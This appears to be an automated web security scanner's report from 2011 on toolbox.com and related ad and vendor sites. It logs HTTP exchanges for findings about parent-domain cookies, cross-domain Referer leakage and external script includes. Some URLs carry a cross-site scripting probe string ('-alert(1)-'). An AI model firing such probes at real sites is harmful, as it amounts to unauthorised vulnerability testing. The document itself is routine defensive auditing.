HTTP/1.1 200 OK Cache-Control: private Content-Length: 40888 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: iNa=is=0&cc=-&st=-&ct=-&pc=-&lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:47:48 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:47:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Jobs </tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /trd/885101 HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
HTTP/1.1 302 Found Cache-Control: private Content-Length: 223 Content-Type: text/html; charset=utf-8 Location: http://windows.ittoolbox.com/research/windows-7-deployment-an-insiders-guide-23009?r=OnlinePostingReminder Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR IND UNI" Set-Cookie: EREF=dest=http%3a%2f%2fwindows.ittoolbox.com%2fresearch%2fwindows-7-deployment-an-insiders-guide-23009%3fr%3dOnlinePostingReminder&source=&rid=885101; domain=.toolbox.com; expires=Mon, 26-Jan-2015 14:46:39 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:46:38 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://windows.ittoolbox.com/research/windows-7-deployment-an-insiders-guide-23009?r=OnlinePostingReminder">here</a>. ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
IBC1132967913=940@2@696567@153413@20110126095544@173.193.214.243;path=/sc/;expires=Monday, 25 July 2011 09:55:44 GMT;domain=IndustryBrains.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /click?sid=940&rqctid=6475&pos=1&lid=696567&cid=153413&pr=2&tstamp=20110126094929&iip=173.193.214.243&ltype=JSCR&lname=560x350v1&url=http://www.netapp.com/us/solutions/infrastructure/virtualization/guarantee.html HTTP/1.1 Host: links.industrybrains.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object Moved Connection: close Date: Wed, 26 Jan 2011 14:55:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: CP="CAO DSP COR CURa " Location: http://www.netapp.com/us/solutions/infrastructure/virtualization/guarantee.html Content-Type: text/html Set-Cookie: IBC1132967913=940@2@696567@153413@20110126095544@173.193.214.243;path=/sc/;expires=Monday, 25 July 2011 09:55:44 GMT;domain=IndustryBrains.com;
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; Expires=Mon, 25 Jan 2016 14:49:31 GMT; Domain=.toolbox.com; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/ittoolglobalit,ittoolitcio,ittoolglobal/1/H.17/s44680976476520?AQB=1&ndh=1&t=26/0/2011%208%3A49%3A50%203%20360&vmt=4A284D57&ns=ittoolbox&pageName=IT%3AIT%20Management%3Ablogs%3Appmtoday%3AFuture%20States&g=http%3A//it.toolbox.com/blogs/ppmtoday%3F306f2%27-alert%281%29-%272382eb5920b%3D1&cc=USD&ch=blogs&events=event2&h1=IT%2CIT%20Management%2Cblogs%2Cppmtoday&h2=blogs%2CIT%2CIT%20Management&c3=Unrecognized&v3=Unrecognized&c5=IT&v5=IT&c6=IT%20Management&v6=IT%20Management&c7=blogs&v7=blogs&v10=IT%3AIT%20Management%3Ablogs%3Appmtoday%3AFuture%20States&c11=7%3A30AM&v11=7%3A30AM&c12=Wednesday&v12=Wednesday&c13=Weekday&v13=Weekday&v20=blogs&v26=blogs&c27=blogs%3Appmtoday&v27=blogs%3Appmtoday&c28=blogs%3Appmtoday&v28=blogs%3Appmtoday&c29=blogs%3Appmtoday&v29=blogs%3Appmtoday&c37=blogs%3AUnrecognized&c40=32&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1 Host: metrics.toolbox.com Proxy-Connection: keep-alive Referer: http://it.toolbox.com/blogs/ppmtoday?306f2'-alert(1)-'2382eb5920b=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_cc=true
Response
HTTP/1.1 302 Found Date: Wed, 26 Jan 2011 14:49:31 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; Expires=Mon, 25 Jan 2016 14:49:31 GMT; Domain=.toolbox.com; Path=/ Location: http://metrics.toolbox.com/b/ss/ittoolglobalit,ittoolitcio,ittoolglobal/1/H.17/s44680976476520?AQB=1&pccr=true&vidn=26A01A3D851D2B4A-60000137A054F13C&&ndh=1&t=26/0/2011%208%3A49%3A50%203%20360&vmt=4A284D57&ns=ittoolbox&pageName=IT%3AIT%20Management%3Ablogs%3Appmtoday%3AFuture%20States&g=http%3A//it.toolbox.com/blogs/ppmtoday%3F306f2%27-alert%281%29-%272382eb5920b%3D1&cc=USD&ch=blogs&events=event2&h1=IT%2CIT%20Management%2Cblogs%2Cppmtoday&h2=blogs%2CIT%2CIT%20Management&c3=Unrecognized&v3=Unrecognized&c5=IT&v5=IT&c6=IT%20Management&v6=IT%20Management&c7=blogs&v7=blogs&v10=IT%3AIT%20Management%3Ablogs%3Appmtoday%3AFuture%20States&c11=7%3A30AM&v11=7%3A30AM&c12=Wednesday&v12=Wednesday&c13=Weekday&v13=Weekday&v20=blogs&v26=blogs&c27=blogs%3Appmtoday&v27=blogs%3Appmtoday&c28=blogs%3Appmtoday&v28=blogs%3Appmtoday&c29=blogs%3Appmtoday&v29=blogs%3Appmtoday&c37=blogs%3AUnrecognized&c40=32&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 X-C: ms-4.3.1 Expires: Tue, 25 Jan 2011 14:49:31 GMT Last-Modified: Thu, 27 Jan 2011 14:49:31 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www389 Content-Length: 0 Content-Type: text/plain
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pages/Toolboxcom/117012708708 HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: datr=ODZATe8iFsKm4n_Xjpn2xOrf; expires=Fri, 25-Jan-2013 14:56:56 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=4TIUB; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Wed, 26 Jan 2011 14:56:57 GMT Content-Length: 154510
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ads/apiresults.js HTTP/1.1 Host: www.indeed.com Proxy-Connection: keep-alive Referer: http://it.toolbox.com/blogs/ppmtoday/why-should-i-change-40067?28cff'-alert(1)-'27a3eb6d893=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
cae_browser=desktop; path=/; domain=.netapp.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /us/solutions/infrastructure/virtualization/guarantee.html HTTP/1.1 Host: www.netapp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Last-Modified: Wed, 26 Jan 2011 14:55:02 GMT X-Server-Name: dv-c1-r1-u14-b5 Content-Type: text/html;charset=utf-8 Date: Wed, 26 Jan 2011 14:57:08 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cae_browser=desktop; path=/; domain=.netapp.com Content-Length: 104728
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cringely/pulpit/ HTTP/1.1 Host: www.pbs.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:57:09 GMT Server: Apache/2.2.17 (Unix) Set-Cookie: www.apache.sid=a407b02ae7db3726c0e6bb20994d70e7; path=/; domain=.pbs.org Accept-Ranges: bytes Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 33427
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.o ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /features/ HTTP/1.1 Host: www.spiceworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:57:12 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: swcls=173.193.214.243.1296053832148878; path=/; domain=.spiceworks.com X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 20485
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
The response contains the following links to other domains:
http://twitter.com/MaaS360
http://www.facebook.com/MaaS360
http://www.linkedin.com/companies/163792
Request
GET /white-paper/?id=95&A=marchex&O=HS&utm_source=marchex&utm_medium=cpc&utm_campaign=Financial&utm_term=Toolbox HTTP/1.1 Host: hs.maas360.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:55:34 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=fdc4855fe7a83f467607711e53c0ff7d; path=/ Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 26998
</iframe> ...[SNIP]... <br /> affiliated with or endorsed by any company listed at this site. Toolbox.com is a subsidiary of the <a href="http://www.exbd.com/">Corporate Executive Board</a> ...[SNIP]... <noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="http://metrics.toolbox.com/b/ss/ittoolglobal,ittoolglobalit/1/H.17--NS/0" height="1" width="1" border="0" alt="" /> ...[SNIP]...
The response contains the following link to another domain:
http://it.toolbox.com/iphone-app/
Request
GET /RealMedia/ads/click_lx.ads/TLBXittoolbox/technology/1{TIME_DATE_STAMP}/L24/1023555694/Top1/BBN/Default_Toolbox_Universal_Multi/iPhone_728x90.png/7263485738303033424c73414270536c?x HTTP/1.1 Host: oasc05134.247realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;
Response
HTTP/1.1 302 Found Date: Wed, 26 Jan 2011 14:55:51 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://it.toolbox.com/iphone-app/ Content-Length: 310 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://it.toolbox.com/iphone-app/">here</a>.</p ...[SNIP]...
The response contains the following link to another domain:
http://it.toolbox.com/ask-a-question
Request
GET /RealMedia/ads/click_lx.ads/TLBXittoolbox/technology/1{TIME_DATE_STAMP}/L24/1306774515/Top1/BBN/Default_Toolbox_Universal_Multi/ask_a_question_728x90.png/7263485738303033424c73414270536c?x HTTP/1.1 Host: oasc05134.247realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;
Response
HTTP/1.1 302 Found Date: Wed, 26 Jan 2011 14:55:52 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://it.toolbox.com/ask-a-question Content-Length: 313 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://it.toolbox.com/ask-a-question">here</a>. ...[SNIP]...
The response contains the following link to another domain:
http://it.toolbox.com/iphone-app/
Request
GET /RealMedia/ads/click_lx.ads/TLBXittoolbox/technology/1{TIME_DATE_STAMP}/L24/1311919668/Top1/BBN/Default_Toolbox_Universal_Multi/iPhone_728x90.png/7263485738303033424c73414270536c?x HTTP/1.1 Host: oasc05134.247realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;
Response
HTTP/1.1 302 Found Date: Wed, 26 Jan 2011 14:55:50 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://it.toolbox.com/iphone-app/ Content-Length: 310 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://it.toolbox.com/iphone-app/">here</a>.</p ...[SNIP]...
The response contains the following link to another domain:
http://it.toolbox.com/ask-a-question
Request
GET /RealMedia/ads/click_lx.ads/TLBXittoolbox/technology/1{TIME_DATE_STAMP}/L24/627413912/Top1/BBN/Default_Toolbox_Universal_Multi/ask_a_question_728x90.png/7263485738303033424c73414270536c?x HTTP/1.1 Host: oasc05134.247realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;
Response
HTTP/1.1 302 Found Date: Wed, 26 Jan 2011 14:55:52 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://it.toolbox.com/ask-a-question Content-Length: 313 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://it.toolbox.com/ask-a-question">here</a>. ...[SNIP]...
The response contains the following link to another domain:
http://it.toolbox.com/companies/white-papers/
Request
GET /RealMedia/ads/click_lx.ads/TLBXittoolbox/technology/1{TIME_DATE_STAMP}/L24/664329713/Top1/BBN/Default_Toolbox_Universal_Multi/whitepaper_ldrbrd_ad.jpg/7263485738303033424c73414270536c?x HTTP/1.1 Host: oasc05134.247realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;
Response
HTTP/1.1 302 Found Date: Wed, 26 Jan 2011 14:55:50 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://it.toolbox.com/companies/white-papers/ Content-Length: 322 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://it.toolbox.com/companies/white-papers/">here</a> ...[SNIP]...
GET /products/desktop-central/index.html?ibtoolbox2 HTTP/1.1 Host: www.manageengine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:57:02 GMT Server: Apache Last-Modified: Mon, 24 Jan 2011 13:46:19 GMT ETag: "16060-d315c0c0" Accept-Ranges: bytes Content-Length: 90208 Cache-Control: max-age=604800 Expires: Wed, 02 Feb 2011 14:57:02 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><!-- Instan ...[SNIP]... <br /> <a href="http://www.site24x7.com" class="secondlevellink" title="Website Monitoring" name="Website-Monitoring">Website Monitoring</a> ...[SNIP]... <td width="90" align="center" valign="bottom"><a target="_blank" href="http://www.pekinhospital.org"> <img height="99" border="0" width="77" title="Pekin Hospital" alt="Pekin Hospital" src="http://www.manageengine.com/products/desktop-central/images/dantharp_testimonial_index.gif"/> ...[SNIP]... <div class="demo-buynow-buttons"> <a href="http://demo.desktopcentral.com/" title="Desktop Management - Live Demo" name="Desktop-Management-Live-Demo" class="demo-button">Desktop Management - Live Demo</a> ...[SNIP]... <span style="display:block" id="spanimg1"><a target="_blank" href="http://windowsitpro.com/article/articleid/100673/new--improved.html"><img id="imgId1" src="http://www.manageengine.com/products/desktop-central/images/winitpro_logo.gif" alt="Desktop Central News in Windows IT Pro" width="205" height="61" /> ...[SNIP]... <span style="display:none" id="spanimg2"><a href="http://www.networkproductsguide.com/best/index.html"><img style="padding-top:5px; vertical-align:middle" id="imgId2" src="http://www.manageengine.com/products/desktop-central/images/2009BestProducts.jpg" width="60" height="85" alt="2009 Best Products" /> ...[SNIP]... 
<map name="Social" id="Social"><area shape="rect" coords="0,1,15,14" href="http://twitter.com/desktopcentral" target="_blank" alt="Follow us on Twitter" /> <area shape="rect" coords="21,0,35,14" href="http://blogs.desktopcentral.com" target="_blank" alt="Desktop Central Blogs" /> <area shape="rect" coords="40,0,53,14" href="http://www.manageengine.com/products/desktop-central/demo/desktop-management-videos.html" target="_blank" alt="Desktop Central Videos on Youtube" /> ...[SNIP]... </span> <a href="http://www.zohocorp.com/"><strong> ...[SNIP]... </a>. All rights reserved. <a href="http://www.webnms.com" title="WebNMS Home" name="WebNMS-Home">WebNMS Home</a> ...[SNIP]... </script> <script type="text/javascript" language="javascript" src="http://t5.trackalyzer.com/trackalyze.js"></script> ...[SNIP]... <area shape="rect" coords="224,1,484,53" alt="Desktop Power Management" title="Desktop Power Management" href="desktop-power-management.html?itop" /> <area shape="rect" coords="484,1,722,53" alt="Desktop Central is Windows 7 Compatible" title="Desktop Central is Windows 7 Compatible" href="http://www.microsoft.com/windows/compatibility/windows-7/en-us/Details.aspx?type=Software&p=Desktop%20Central&v=Zoho%20Corporation&uid=7&pf=0&pi=6&s=desktop&os=32-bit" target="_blank" /> </map> ...[SNIP]...
GET /products/service-desk/index.html?ibad HTTP/1.1 Host: www.manageengine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:57:03 GMT Server: Apache Last-Modified: Tue, 25 Jan 2011 15:24:32 GMT ETag: "fa73-502d2c00" Accept-Ranges: bytes Content-Length: 64115 Cache-Control: max-age=604800 Expires: Wed, 02 Feb 2011 14:57:03 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
The response contains the following links to other domains:
http://twitter.com/gcluley/lists/sophos
http://www.facebook.com/SophosSecurity
http://www.linkedin.com/companies/sophos/
http://www.sophos.cn/
http://www.sophos.de/
http://www.sophos.fr/
http://www.sophos.it/
http://www.youtube.com/user/SophosLabs
Request
GET /lp/compliancefordummies/?utm_source=Non-campaign&utm_medium=Web-banner&utm_campaign=NA-WB-CFD-Marchex HTTP/1.1 Host: www.sophos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Sophos - Request your free copy of Compliance for Dummies</title> <!-- head ...[SNIP]... <div style="float: right; width: 136px; margin-right: 5px; height: 35px;">
GET /features/?swsrc=marchex-test-campaign HTTP/1.1 Host: www.spiceworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:57:14 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: swcls=173.193.214.243.1296053834736649; path=/; domain=.spiceworks.com X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 20541
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement that a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons), then you should consider reimplementing the script's functionality within your own code.
GET / HTTP/1.1 Host: businessintelligence.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 79300 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=lgzfjg45p5p4ttjbryycmjiv; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Business In ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/bi.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=BI;kw=BusinessIntelligence;kw=BusinessObjects;kw=reporting;kw=onlineanalyticalprocessing;kw=analytics;kw=datamining;kw=businessperformancemanagement;kw=benchmarking;kw=textmining;kw=predictiveanalytics;kw=dashboard;kw=scorecard;kw=Actuate;kw=Cognos;kw=SPSS;kw=MicroStrategy;kw=Hyperion;sz=728x90,468x60,1x1;tile=6;ord=48644884?">
GET / HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 70865 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ev3vw13ts4uun2552nfwiz45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:19 GMT Connection: close
GET /blogs/ HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 85344 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=sthdbdnv4isdq155nf5krjic; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> IT Manageme ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/cio.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=ITManagement;kw=CareerDevelopment;kw=outsourcing;kw=offshoring;kw=ROI;kw=eCommerce;kw=GreenIT;kw=ITWorkforceManagement;kw=BPM;kw=BusinessProcessManagement;kw=Compliance;kw=ITPortfolioManagement;kw=SOXITCompliance;sz=728x90,468x60,1x1;tile=6;ord=623022013?">
GET /directory/ HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 52564
